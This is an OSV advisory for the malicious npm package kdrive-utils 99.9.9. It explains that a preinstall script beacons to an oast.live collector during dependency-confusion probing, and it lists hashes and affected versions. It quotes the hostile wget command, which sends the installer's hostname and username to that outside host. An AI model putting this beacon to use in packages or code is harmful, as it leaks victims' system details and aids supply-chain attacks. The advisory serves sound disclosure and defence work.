MAL-2026-6295

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/kdrive-utils/MAL-2026-6295.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6295
Published
2026-06-23T14:10:49Z
Modified
2026-06-23T14:31:20.115608629Z
Summary
Malicious code in kdrive-utils (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943)

package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O- "http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)". The installer's hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener — an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943",
            "id": "IN-MAL-2026-007201",
            "source": "amazon-inspector",
            "modified_time": "2026-06-23T14:10:49Z",
            "versions": [
                "99.9.9"
            ],
            "import_time": "2026-06-23T14:23:02.850265321Z"
        }
    ]
}
References
Credits

Affected packages

npm / kdrive-utils

Package

Affected ranges

Affected versions

99.*
99.9.9

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/kdrive-utils/MAL-2026-6295.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "sha256": "3e083f1bb63f99ec23aa5406ef23b8d95565aa155a08a7f5fc5e1c96a71a2e29",
            "tlsh": "09d05b298d62d93719c446765977a50ab5604d6e00987d1977431118407c77264ba64d",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "kdrive-utils-99.9.9.tgz",
            "hashes": {
                "sha1": "415c520c5996bac1e61987623d5d77f1b01b6008",
                "sha512_sri": "sha512-Dqvumed8dz0pGCUo0GixsrzVTgwqR5EkrmJQeJX+zsU5RdfonHXyBaaZtVJMuYxTw0JeyQZpeNGmErWbEUKs2A=="
            }
        }
    ]
}